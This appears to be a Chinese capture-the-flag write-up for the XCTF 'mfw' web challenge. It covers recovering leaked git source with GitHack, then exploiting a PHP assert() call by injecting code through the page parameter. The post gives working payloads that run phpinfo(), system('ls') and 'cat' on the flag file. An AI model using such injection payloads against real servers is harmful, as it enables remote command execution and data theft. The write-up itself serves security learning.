2020.4.5 xctf(mfw)②

打开网页看见(猜测git源码泄露):
在这里插入图片描述在URL后面加上./git发现:
在这里插入图片描述使用工具GitHack进行爬取
在这里插入图片描述在这里插入图片描述在这里插入图片描述
发现源码内存在flag.php 感觉没啥用
在这里插入图片描述

if (isset($_GET[‘page’])) {
$page = $_GET[‘page’];
} else {
$page = “home”;
}

$file = “templates/. $page ..php”;

// I heard ‘…’ is dangerous!
assert(“strpos(’$file, ‘…’) === false”) or die(“Detected hacking attempt!”);

// TODO: Make this look nice
assert(“file_exists(’$file)) or die(“That file doesn’t exist!”);

了解assert()函数和strpos函数的使用:
在这里插入图片描述在这里插入图片描述assert()函数会将读入的代码当做PHP代码来执行,这就方便了!!
进行注入,注入的思路:

首先对strpos函数进行闭合,构造一下,**page=’)**

可以把后面', '..') === false的给注释掉**(这里必须用 // 来注释)**
构造**page=').phpinfo();//**,可以得到回显

在这里插入图片描述 或者不注释也行,直接插入,构造page=’.phpinfo().’,也可以看见:
在这里插入图片描述

既然可以执行函数,那就简单了,使用system()函数(system函数详解),构造查看目录的

payload:?page='.system("ls").'或者page=').system("ls");//

前者直接显示,后者在源码中才能看见。

由于源码直接下载有,所以直接构造得到flag的payload:

?page=').system("cat templates/flag.php");//或者?page='.system("cat templates/flag.php").'

两者都需查看源码!!
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值